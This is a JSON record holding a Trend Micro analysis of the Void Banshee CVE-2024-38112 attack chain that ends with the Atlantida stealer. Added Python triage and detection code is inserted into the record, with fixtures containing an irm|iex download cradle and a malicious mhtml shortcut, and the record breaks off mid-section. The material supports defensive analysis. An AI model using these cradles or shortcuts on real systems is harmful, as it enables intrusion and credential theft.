{
	"id": "2560770d-ce85-4a1e-a467-102496fe1846",
	"created_at": "2026-04-06T00:21:33.452709Z",
	"updated_at": "2026-04-10T03:24:33.88581Z",
	"deleted_at": null,
	"sha1_hash": "2c05ab898e557bfc8ccbd814babf8255ec0fffcc",
	"title": "CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3439081,
	"plain_text": "CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks\r\nBy: Peter Girnus, Aliakbar Zahravi. Jul 15, 2024. Read time: 12 min (3358 words)\r\nPublished: 2024-07-15 · Archived: 2026-04-02 10:37:54 UTC\r\nExploits \u0026 Vulnerabilities\r\nOur threat hunters discovered CVE-2024-38112, which the APT group Void Banshee used as a zero-day to access and execute files through the disabled Internet Explorer via MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.\r\nReport Highlights:\r\nIn May, threat hunters at Trend Micro’s Zero Day Initiative (ZDI) discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported it to Microsoft as a zero-day.\r\nThe vulnerability CVE-2024-38112 (ZDI-CAN-24433) was used as a zero-day to access and execute files through the disabled Internet Explorer via MSHTML.\r\nAs part of Void Banshee's attack chain, CVE-2024-38112 is used to infect victim machines with the Atlantida info-stealer, which focuses on pilfering system information and sensitive data (such as passwords and cookies) from various applications.\r\nVoid Banshee lures victims with zip archives containing malicious files disguised as book PDFs; these are disseminated through cloud-sharing websites, Discord servers, and online libraries, among others.
Void Banshee's attacks are concentrated in North America, Europe, and Southeast Asia.\r\nThis zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that threat actors can still exploit to infect unsuspecting users with ransomware or backdoors, or use as a conduit for other kinds of malware.\r\nFor additional background on this entry, please read the ZDI blog entry, \"Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD\".\r\nTrend Micro Zero Day Initiative (ZDI) discovered the MHTML remote code execution (RCE) vulnerability CVE-2024-38112. We immediately alerted Microsoft that this vulnerability was being used in the wild, tracking it as ZDI-CAN-24433. CVE-2024-38112 was used as part of an attack chain by the advanced persistent threat (APT) group Void Banshee, which targets North America, Europe, and Southeast Asia for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida stealer, first discovered in January 2024. Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.\r\nIn mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry.
The Void Banshee group used similar tools, tactics, and procedures (TTPs) that involved abusing internet shortcuts (.URL) and Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate HTML documents) protocol, which was able to reach the system-disabled Internet Explorer on Windows.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 1 of 18\n\nIn the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and the x-usc directive through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines. This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.\r\nTrend protects users from threat actors that exploit CVE-2024-38112 through the security solutions listed at the end of this blog entry.\r\nInternet Explorer used as an attack vector\r\nInternet Explorer (IE) support officially ended on June 15, 2022. IE has also been officially disabled in later versions of Windows 10 and in all versions of Windows 11. Disabled, however, does not mean IE was removed from the system. The remnants of IE exist on modern Windows systems, though they are not accessible to the average user (Figure 2).\r\nFigure 2. Internet Explorer still exists on modern Windows systems\r\nIf a user attempts to execute the IE executable (iexplore.exe), its replacement, Microsoft Edge, opens instead. For users and organizations that need to access sites and workloads through Internet Explorer, Microsoft provides IE mode for Microsoft Edge (Figure 3).
IE mode for Edge contains some IE-specific functionality, but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the end user.\r\nFigure 3. Internet Explorer mode in Microsoft Edge\r\nIn this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which we disclosed to Microsoft. These samples could run files and open websites through the disabled IE process by exploiting CVE-2024-38112 through MSHTML. By using specially crafted .URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks. Using the disabled IE process as a proxy to reach sites and scripts is especially alarming, as IE has historically been a vast attack surface and now receives no further updates or security fixes.\r\nThis vulnerability was patched as part of the July 2024 Patch Tuesday. As of this patch cycle, Microsoft has unregistered the MHTML handler from Internet Explorer (Figure 4).\r\nFigure 4. 
MHTML handler is no longer registered with Internet Explorer\r\nThis means that MHTML is no longer usable inside internet shortcut files.\r\nTechnical analysis\r\nT1566.002: Spearphishing Links\r\nVoid Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as PDFs, delivered via spearphishing links (T1566.002) on online libraries, cloud sharing sites, Discord, and a slew of compromised websites.\r\nSome PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and places where digital copies of books are collected (Figure 5). In the case of exploiting CVE-2024-38112, Void Banshee changed the default icon of an internet shortcut file to that of a PDF file to entice the victim into executing it.\r\nFigure 5. Sample book lure\r\nStage 1: Malicious internet shortcut (URL) file\r\nName: Books_A0UJKO.pdf.url\r\nSHA256: c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae\r\nSize: 267 bytes\r\nFile type: Internet shortcut\r\nThe zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One of the samples we uncovered, \"Books_A0UJKO.pdf.url\", is designed to look like a PDF copy of a book (Figure 6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive in the internet shortcut’s URL parameter. This logic string is similar to the exploit logic of CVE-2021-40444 (Microsoft Office Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers.\r\nFigure 6. 
Malicious URL file disguised to look like a PDF of a book\r\nIn this attack, CVE-2024-38112 was used as a zero-day to open the system-disabled IE and redirect the victim to a compromised website hosting a malicious HTML Application (HTA), as shown in Figure 7.\r\nFigure 7. Content of “Books_A0UJKO”\r\nIn the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in the native Internet Explorer through the iexplore.exe process.\r\nStage 2: HTML file downloader\r\nName: test1.html\r\nSHA256: d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb\r\nSize: 716 bytes\r\nFile type: HTML\r\nAs mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled domain where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file, the attacker can also control the size of the IE window in which the site is displayed. The threat actor uses this to hide browser information and to mask the download of the next stage of the infection chain from the victim. Void Banshee specifically crafted this HTML file with window-size elements to control the size of the IE window.\r\nFigure 8. Contents of “test1.html”\r\nOnce this URL is contacted via IE, the page attempts to open the malicious HTA file, prompting the user to open or save the HTML application (Figure 9). This behavior is unique to IE in that it offers to open HTA files directly, whereas modern browsers like Microsoft Edge or Chrome do not have a default open action for them.\r\nFigure 9. 
Internet Explorer downloads the “Books_A0UJKO.pdf\u003c26 spaces\u003e.hta” file\r\nThe attacker inserts 26 spaces before the .hta extension of “Books_A0UJKO.pdf.hta” to push the extension off the screen (Figure 10). The ellipsis indicates that the filename contains additional content; however, it is not clickable or expandable. To an unsuspecting user, it appears to be merely a PDF file.\r\nFigure 10. The HTA file extension does not appear on the screen\r\nStage 3: HTA file and VBS downloader\r\nName: Books_A0UJKO.pdf\u003c26 spaces\u003e.hta\r\nSHA256: 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33\r\nSize: 1,662 bytes\r\nFile type: HTML Application (HTA)\r\nThe HTA file contains a Visual Basic Script (VBScript) that decrypts XOR-encrypted content with key 4 and executes the result using PowerShell (Figure 11). This script uses PowerShell to download an additional script hosted on a compromised web server and runs it using the PowerShell aliases irm (Invoke-RestMethod) and iex (Invoke-Expression). Finally, the script creates a new process for the downloaded script using the Win32_Process WMI class.\r\nFigure 11. 
The VBScript in the HTA file\r\nStage 4: PowerShell trojan downloader\r\nName: become.txt\r\nSHA256: c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302\r\nSize: 551 bytes\r\nFile type: PowerShell\r\nInitially, the script defines DllImport attributes to import two functions:\r\nGetConsoleWindow from kernel32.dll, which retrieves the handle of the console window associated with the calling process.\r\nShowWindow from user32.dll, which sets the visibility state of the specified window.\r\nIt then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the namespace crumble542543 with the name culture6546.\r\nNext, the script retrieves the handle of the console window using the GetConsoleWindow method and stores it in $danger5646. It then calls ShowWindow with the window handle and the parameter 0 (SW_HIDE), which hides the console window. This technique is often employed by malware to run without displaying any user interface.\r\nThe script proceeds to create a new System.Net.WebClient object, which is used to download data from a malicious server. The downloaded data is then loaded as a .NET assembly using the System.Reflection.Assembly Load method. Finally, the script invokes the entry point of the downloaded assembly, executing the code contained within it inside the PowerShell process.\r\nFigure 12. Contents of the “become.txt” PowerShell file\r\nStage 5: .NET trojan loader\r\nName: LoadToBadXml.exe, tedfd.te, Vnn3qRKOxH.exe\r\nSHA256: 13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d\r\nSize: 6,994,432 bytes\r\nFile type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nLoadToBadXml is a .NET Trojan loader that is obfuscated using Eziriz .NET Reactor.
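The two XOR layers in this chain, the key 4 used by the Stage 3 HTA script and the byte array key (3, 2, 2) that LoadToBadXml uses for its payload (Figure 13), are both instances of repeating-key XOR. The Python below is an added example, not code from the report or from the samples: it implements the general decryptor once, recovers a single-byte key by known plaintext (useful when the HTA has been modified and the key is not obvious from the script), and runs both on constructed stand-in blobs. The plaintexts, the expected fragment ' | iex' and the fake PE header are placeholders for this example, not the real scripts.

```python
# Added example (not from the original report): repeating-key XOR as used by
# the Stage 3 HTA (key 4) and the Stage 5 .NET loader (key 3, 2, 2),
# generalised to any key length, plus known-plaintext recovery of a
# single-byte key. All blobs below are constructed placeholders.

def xor_with_key(data, key):
    '''Repeating-key XOR over data. XOR is its own inverse, so the same call
    both encrypts and decrypts. key may be an int, a list of ints or bytes.'''
    if isinstance(key, int):
        key = [key]
    key = bytes(key)
    if not key:
        raise ValueError('empty key')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_single_byte_key(blob, known):
    '''Return the first single-byte key under which blob decrypts to something
    containing the expected plaintext fragment (for a stage like the HTA script,
    a PowerShell alias it is known to use), or None if no key matches.'''
    if isinstance(known, str):
        known = known.encode()
    for k in range(256):
        if known in xor_with_key(blob, k):
            return k
    return None


def looks_like_pe(data):
    '''Cheap sanity check for a decrypted Stage 5 payload: PE images start
    with the MZ signature.'''
    return data[:2] == b'MZ'


# Constructed stand-ins: a PowerShell download cradle in the shape the report
# describes (irm piped to iex), XORed with key 4, and a fake PE header XORed
# with the loader key (3, 2, 2). The hostname is a placeholder.
STAGE3_PLAINTEXT = b'powershell -c irm http://example.invalid/become.txt | iex'
STAGE3_BLOB = xor_with_key(STAGE3_PLAINTEXT, 4)
STAGE5_PLAINTEXT = b'MZ' + bytes(range(64))
STAGE5_BLOB = xor_with_key(STAGE5_PLAINTEXT, [3, 2, 2])


def decrypt_stage3(blob, known=' | iex'):
    '''Recover the HTA key by known plaintext and return (key, plaintext).'''
    key = recover_single_byte_key(blob, known)
    if key is None:
        return None, None
    return key, xor_with_key(blob, key)


def decrypt_stage5(blob, key=(3, 2, 2)):
    '''Decrypt a loader blob and return the payload only if it is a PE image.'''
    payload = xor_with_key(blob, key)
    return payload if looks_like_pe(payload) else None


if __name__ == '__main__':
    key, script = decrypt_stage3(STAGE3_BLOB)
    print('stage 3 key:', key, 'script:', script.decode())
    payload = decrypt_stage5(STAGE5_BLOB)
    print('stage 5 payload starts with MZ:', payload is not None)
```

Because XOR is its own inverse, xor_with_key both produces the constructed samples and decrypts them; decrypt_stage5 refuses to return a payload that does not start with MZ, which catches a wrong key before anything downstream tries to parse it.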
As shown in Figure 13, LoadToBadXml decrypts XOR-encrypted payloads using the byte array key (3, 2, 2).\r\nFigure 13. The payload decryption process\r\nIt then injects them into C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe. The malware employs a common process injection technique, which involves the following steps:\r\nCreate process: The malware uses the CreateProcess Windows API to launch RegAsm.exe in a suspended state.\r\nMemory allocation: It allocates space within the RegAsm.exe process using the VirtualAllocEx API.\r\nWrite payload: The decrypted payload is then written into the allocated memory using the WriteProcessMemory API.\r\nExecute payload: Finally, the malware creates a remote thread within the RegAsm.exe process to execute the injected payload using the CreateRemoteThread API.\r\nLoadToBadXml is a modified version of the shellcode injector from Program.cs of the open-source project Donut Loader (Figure 14).\r\nFigure 14. LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process\r\nStage 6: Donut loader\r\nSHA256: 119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb\r\nSize: 6.59 MB (6,918,144 bytes)\r\nFile type: Shellcode\r\nDonut is open-source position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies.
In this attack, Donut is used to decrypt and execute the Atlantida stealer inside the RegAsm.exe process memory.\r\nStage 7: Atlantida stealer analysis\r\nName: AtlantidaStealer.exe\r\nSHA256: 6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750\r\nSize: 6.6 MB (6,883,112 bytes)\r\nCompilation time: 2024-01-25 15:52:03\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nThe final payload delivered in this attack is the Atlantida stealer, an info-stealer with extensive capabilities. Overall, the malware is built from the open-source stealers NecroStealer and PredatorTheStealer, incorporating many of the same functions and structures found in those programs. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. The malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system's desktop. Moreover, it captures the victim's screen and gathers comprehensive system information. The stolen data is then compressed into a ZIP file and transmitted to the attacker over TCP.\r\nUpon execution, the malware initializes the ZIP file, sets up the necessary structures, and manages the process of writing files to the archive. It then retrieves the \"APPDATA\" and \"DESKTOP\" paths and stores them in a global variable that is used throughout the code to access these locations; the paths are resolved with the SHGetFolderPathA Windows API using the CSIDL values 0x1A (CSIDL_APPDATA) and 0x00 (CSIDL_DESKTOP), respectively.\r\nAfterward, it takes a screenshot, saves it as \"screenshot.jpeg\", and adds it to the ZIP.
The compression method is similar to the one used in zip.cpp of NecroStealer and PredatorTheStealer.\r\nTo retrieve an infected system's geolocation information, such as IP address, country, and zip code, the malware contacts its command-and-control (C\u0026C) server over port 6666 instead of using public services. Figure 15 shows an example of a C\u0026C response:\r\nFigure 15. C\u0026C response with the infected system’s geolocation information\r\nThe malware then stores this in “Geo Information.txt” and appends it to the ZIP archive (Figure 16).\r\nNext, the malware collects system information such as RAM, GPU, CPU, and screen resolution, stores it in “User Information.txt”, and appends this file to the ZIP archive held in memory (Figure 17).\r\nFurthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the malware searches for the XML file located at C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\FileZilla\\recentservers.xml, which contains information about recently connected servers. This XML file typically includes data such as the server's hostname, port number, username, and connection type. Additionally, the malware attempts to steal data that includes:\r\nAll files with the \".txt\" extension from the infected system’s desktop directory\r\nAll JSON files under C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Binance\r\nTelegram data under C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Telegram Desktop\r\nSteam configurations\r\nGoogle Chrome, Mozilla Firefox, and Microsoft Edge cookies and credentials\r\nThe Atlantida stealer can also steal information from cryptocurrency-related Google Chrome and Microsoft Edge extensions. Each extension is identified by its extension ID.
The malware uses this information to harvest the data stored within each extension.\r\nThis is the extension path:\r\nC:\\Users\\\u003cYOUR_USERNAME\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\\u003cExtension ID\u003e\r\nThe following is a list of the targeted cryptocurrency wallet browser extensions:\r\nExtension name Google Chrome extension ID\r\nAuroWallet cnmamaachppnkjgnildpdmkaakejnhae\r\nBinanceWallet fhbohimaelbohpjbbldcngcnapndodjp\r\nBitClip ijmpgkjfkbfhoebgogflfebnmejmfbml\r\nBitoke oijajbhmelbcoclnkdmembiacmeghbae\r\nBitAppWallet fihkakfobkmkjojpchpfgcmhfjnmnfpi\r\nByone nlgbhdfgdhgbiamfdfmbikcdghidoadd\r\nCardWallet apnehcjmnengpnmccpaibjmhhoadaico\r\nCloverWallet nhnkbkgjikgcigadomkphalanndcapjk\r\nCoin89 aeachknmefphepccionboohckonoeemg\r\nCryptoAirdrops dhgnlgphgchebgoemcjekedjjbifijid\r\nCyanoWallet dkdedlpgdmmkkfjabffeganieamfklkm\r\nEQUALWallet blnieiiffboillknjnepogjhkgnoapac\r\nFlint hnhobjmcibchnmglfbldbfabcgaknlkj\r\nFreaksAxie copjnifcecdedocejpaapepagaodgpbh\r\nGuarda jbdaocneiiinmjbjlgalhcelgbejmnid\r\nGuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig\r\nguildwallet nanjmdknhkinifnkgdcggcfnhdaammmj\r\nHyconLiteClient bcopgchhojmggmffilplmbdicgaihlkp\r\nICONex flpiciilemghbmfalicajoolhkkenfel\r\niWallet kncchdigobghenbbaddojjnnaogfppfj\r\nKeplr dmkamcknogkgcdfhhbddcghachkejeap\r\nKHC hcflpincpppdclinealmandijcmnkbgn\r\nLeaf Wallet cihmoadaighcejopammfbmddcmdekcje\r\nLiqualityWallet kpfopkelmapcoipemfendmdcghnegimn\r\nMathWallet afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nMetamask nkbihfbeogaeaoehlefnkodbefgpgknn\r\nMetaWallet bkklifkecemccedpkhcebagjpehhabfb\r\nMEW CX nlbmnnijcnlegkjjpcfjclmcfggfefdm\r\nNaboxWallet nknhiehlklippafakaeklbeglecifhad\r\nNami lpfcbjknijpeeillifnkikgncikgfhdo\r\nNashExtension onofpnbbkehpmmoabgpcpmigafmmnjhl\r\nNiftyWallet 
jbdaocneiiinmjbjlgalhcelgbejmnid\r\nOasis ppdadbejkmjnefldpcdjhnkpbjkikoip\r\nOneKey infeboajgfhgbjpjbeppbkgnabfdkdaf\r\nPhantom bfnaelmomeimhlpmgjnjophhpkkoljpa\r\nPolymesh Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf\r\nRabby acmacodkjbdgmoleebolmdjonilkdbch\r\nSaturn Wallet cphhlgmgameodnhkjdmkpanlelnlohao\r\nsollet fhmfendgdocmcbmfikdcogofphimnkno\r\nTerraStation aiifbnbfobpmeekipheeijimdpnlpgpp\r\nTemple ookjlbkiijinhpmnjffcofjonbfbgaoc\r\nTezBox mnfifefkajgofkcjkemidiaecocnkjeh\r\nTronWallet pnndplcbkakcplkjnolgbkdgjikjednm\r\nWombat amkmjjmmflddogmhpjloimipbofnfjih\r\nXDefiWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf\r\nYoroi ffnbelfdoeiohenkjibnmadjiehjhajb\r\nExtension name Microsoft Edge extension ID\r\nMetaMask ejbalbakoplchlghecdalmeeeajnimhm\r\nThe malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker's C\u0026C server over TCP port 6655.\r\nFigure 18. Example of exfiltration of stolen data\r\nConclusion\r\nIn this campaign, we have observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE on their machines to infect users and organizations with ransomware or backdoors, or use them as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to exploit disabled components such as IE poses a significant threat to organizations worldwide. Since components such as IE have a large attack surface and no longer receive patches, they represent a serious security concern for Windows users.
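As a practical follow-up to the Stage 1 shortcut and the padded HTA filename described in the technical analysis, the Python below is an added example (not code from the report): it parses an internet shortcut the way a triage script would, flags the mhtml: handler and the x-usc directive in its URL value, and flags filenames that hide their real extension behind a double extension or trailing whitespace. The shortcut body, the hostname and the exact directive spelling (mhtml: ... !x-usc: ...) are assumptions for this example, not content reproduced from the samples.

```python
# Added example (not from the original report): static triage of a Windows
# internet shortcut (.URL) file for the CVE-2024-38112 pattern, plus the
# filename tricks used for the lure and the HTA. The shortcut body, hostname
# and exact directive spelling (mhtml: ... !x-usc: ...) are assumptions for
# this example, not content reproduced from the samples.

MHTML_SCHEME = 'mhtml:'
XUSC_DIRECTIVE = '!x-usc:'

# Constructed .URL body in the shape the report describes.
SAMPLE_URL_FILE = '''[InternetShortcut]
URL=mhtml:http://example.invalid/Books_A0UJKO.pdf!x-usc:http://example.invalid/test1.html
ShowCommand=7
'''

# Constructed benign shortcut used as a negative case.
BENIGN_URL_FILE = '''[InternetShortcut]
URL=https://example.invalid/docs/
'''


def parse_internet_shortcut(text):
    '''Parse the INI-style body of a .URL file. Only keys inside the
    [InternetShortcut] section are returned, lower-cased.'''
    fields = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].lower()
            continue
        if section != 'internetshortcut' or '=' not in line:
            continue
        key, value = line.split('=', 1)
        fields[key.strip().lower()] = value.strip()
    return fields


def analyze_shortcut_url(url):
    '''Return (findings, effective_target) for a .URL target string. The
    effective target is what is left after stripping the handler prefix and
    the x-usc directive, i.e. the page IE would actually be sent to.'''
    findings = []
    lowered = url.lower()
    target = url
    if lowered.startswith(MHTML_SCHEME):
        findings.append('mhtml: protocol handler (reaches the disabled IE via MSHTML)')
        target = url[len(MHTML_SCHEME):]
    idx = lowered.find(XUSC_DIRECTIVE)
    if idx != -1:
        findings.append('!x-usc: directive (opens the trailing URL in Internet Explorer)')
        target = url[idx + len(XUSC_DIRECTIVE):]
    return findings, target


def analyze_filename(name):
    '''Flag the two filename tricks described in the report: a double
    extension whose last part is .url or .hta, and whitespace padding that
    pushes the real extension out of view.'''
    findings = []
    stem, dot, ext = name.rpartition('.')
    if not dot:
        return findings
    trimmed = stem.rstrip()
    if trimmed != stem:
        findings.append('%d padding spaces before .%s extension' % (len(stem) - len(trimmed), ext))
    if ext.lower() in ('url', 'hta') and '.' in trimmed:
        findings.append('double extension .%s.%s' % (trimmed.rpartition('.')[2].lower(), ext.lower()))
    return findings


def triage_shortcut(name, content):
    '''Combine the filename and URL checks into one verdict. Only the URL
    findings decide suspicious; the filename findings are supporting context.'''
    fields = parse_internet_shortcut(content)
    url_findings, target = analyze_shortcut_url(fields.get('url', ''))
    findings = analyze_filename(name) + url_findings
    return {'name': name, 'target': target, 'findings': findings,
            'suspicious': bool(url_findings)}


if __name__ == '__main__':
    for name, body in (('Books_A0UJKO.pdf.url', SAMPLE_URL_FILE), ('notes.url', BENIGN_URL_FILE)):
        print(triage_shortcut(name, body))
    print(analyze_filename('Books_A0UJKO.pdf' + ' ' * 26 + '.hta'))
```

The verdict is driven by the URL value rather than the filename, because a double extension on its own is common in benign shortcuts, whereas an mhtml: target with an x-usc directive has no legitimate use in a .URL file now that Microsoft has unregistered the handler.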
The ability of threat actors to reach unsupported and disabled system components, and thereby circumvent modern web sandboxes such as IE mode for Microsoft Edge, is a significant industry concern.\r\nTo make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the wild to safeguard the industry. The ZDI program is the largest vendor-agnostic bug bounty program in the world, disclosing vulnerabilities to vendors at 2.5x the rate.\r\nOrganizations can help protect themselves from these kinds of attacks with Trend Vision One™️, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security posture and effectiveness of an organization, including against zero-day attacks.\r\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their systems are already compromised or breached and work to immediately isolate affected data or toolchains.
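For detection engineering, the chain described above also leaves a distinctive process lineage: the shortcut launches iexplore.exe with an mhtml: target, IE hands the HTA to its host process, the VBScript in the HTA starts PowerShell, and the PowerShell stage loads a .NET assembly in-process that spawns RegAsm.exe. The Python below is an added example (not a Trend detection and not code from the report) that runs one narrow rule per step over a constructed process-creation log. The log shape (pid, ppid, image basename, command line) is loosely modelled on Sysmon Event ID 1; the parent-child links, hostnames and command lines are assumptions for the example, and mshta.exe as the HTA host is standard Windows behaviour that the report does not spell out.

```python
# Added example (not from the original report): process-lineage detection for
# the execution chain described above, run over a constructed process-creation
# log. The log shape, hostnames, command lines and parent-child links are
# assumptions for this example; mshta.exe as the HTA host process is standard
# Windows behaviour.

SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}

# Constructed events. ppid 1 stands for a process that is not in the log, so
# the lineage walk stops at the first ancestor we have a record for.
SAMPLE_EVENTS = [
    {'pid': 100, 'ppid': 1, 'image': 'svchost.exe', 'cmdline': 'svchost.exe -k netsvcs -p'},
    {'pid': 200, 'ppid': 100, 'image': 'iexplore.exe',
     'cmdline': 'iexplore.exe mhtml:http://example.invalid/Books_A0UJKO.pdf!x-usc:http://example.invalid/test1.html'},
    {'pid': 300, 'ppid': 200, 'image': 'mshta.exe',
     'cmdline': 'mshta.exe Books_A0UJKO.pdf' + ' ' * 26 + '.hta'},
    {'pid': 400, 'ppid': 300, 'image': 'powershell.exe',
     'cmdline': 'powershell.exe -w hidden -c irm http://example.invalid/become.txt | iex'},
    {'pid': 500, 'ppid': 400, 'image': 'RegAsm.exe', 'cmdline': 'RegAsm.exe'},
    {'pid': 600, 'ppid': 1, 'image': 'msedge.exe', 'cmdline': 'msedge.exe https://example.invalid/'},
    {'pid': 700, 'ppid': 1, 'image': 'powershell.exe', 'cmdline': 'powershell.exe -File backup.ps1'},
]


def _image(event):
    return event['image'].lower()


def _parent_image(event, by_pid):
    parent = by_pid.get(event['ppid'])
    return _image(parent) if parent else ''


def _has_mhtml_launch(cmdline):
    lowered = cmdline.lower()
    return 'mhtml:' in lowered or '!x-usc:' in lowered


# Each rule is (name, predicate(event, parent_image)). They are deliberately
# narrow and independent: one firing is worth a look, several firing on the
# same lineage is a strong signal.
RULES = [
    ('iexplore_mhtml_launch',
     lambda e, p: _image(e) == 'iexplore.exe' and _has_mhtml_launch(e['cmdline'])),
    ('hta_host_spawned_by_ie',
     lambda e, p: _image(e) == 'mshta.exe' and p == 'iexplore.exe'),
    ('powershell_from_hta',
     lambda e, p: _image(e) in ('powershell.exe', 'pwsh.exe') and p == 'mshta.exe'),
    ('irm_iex_download_cradle',
     lambda e, p: _image(e) in ('powershell.exe', 'pwsh.exe')
     and 'irm ' in e['cmdline'].lower() and 'iex' in e['cmdline'].lower()),
    ('regasm_from_script_host',
     lambda e, p: _image(e) == 'regasm.exe' and p in SCRIPT_HOSTS),
]


def detect(events):
    '''Return a list of (rule_name, pid) for every event that trips a rule,
    in log order.'''
    by_pid = {e['pid']: e for e in events}
    hits = []
    for e in events:
        parent = _parent_image(e, by_pid)
        for name, predicate in RULES:
            if predicate(e, parent):
                hits.append((name, e['pid']))
    return hits


def lineage(events, pid):
    '''Walk ppid links from pid up to the oldest ancestor present in the log
    and return the image names root-first, for the analyst to eyeball.'''
    by_pid = {e['pid']: e for e in events}
    chain = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]['image'])
        pid = by_pid[pid]['ppid']
    return list(reversed(chain))


if __name__ == '__main__':
    for name, pid in detect(SAMPLE_EVENTS):
        print(name, pid, ' -> '.join(lineage(SAMPLE_EVENTS, pid)))
```

The benign Edge and scheduled-PowerShell events in the sample log trip nothing, while every process in the malicious lineage trips at least one rule; the parent checks are what keep the PowerShell and RegAsm rules from firing on ordinary administration and developer activity.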
With a broader perspective and rapid response, organizations can address breaches and protect their remaining systems, especially with technologies such as Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions such as Trend Micro™ XDR, which can detect, scan, and block malicious content across the modern threat landscape.\r\nTrend protections\r\nThe following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112 (ZDI-CAN-24433) and Atlantida malware exfiltration attempts.\r\nTrend Vision One Model\r\nMicrosoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)\r\nSvchost Executes Iexplorer\r\nTrend Micro Cloud One - Network Security \u0026 TippingPoint Filters\r\n44417 - ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)\r\n44453 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Geo Information)\r\n44454 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Exfil Data)\r\nTrend Vision One Endpoint Security, Trend Cloud One - Workload and Endpoint Security, Deep Security and Vulnerability Protection IPS Rules\r\n1012075 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability Over SMB (CVE-2024-38112)\r\n1012074 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2024-38112)\r\nMITRE ATT\u0026CK 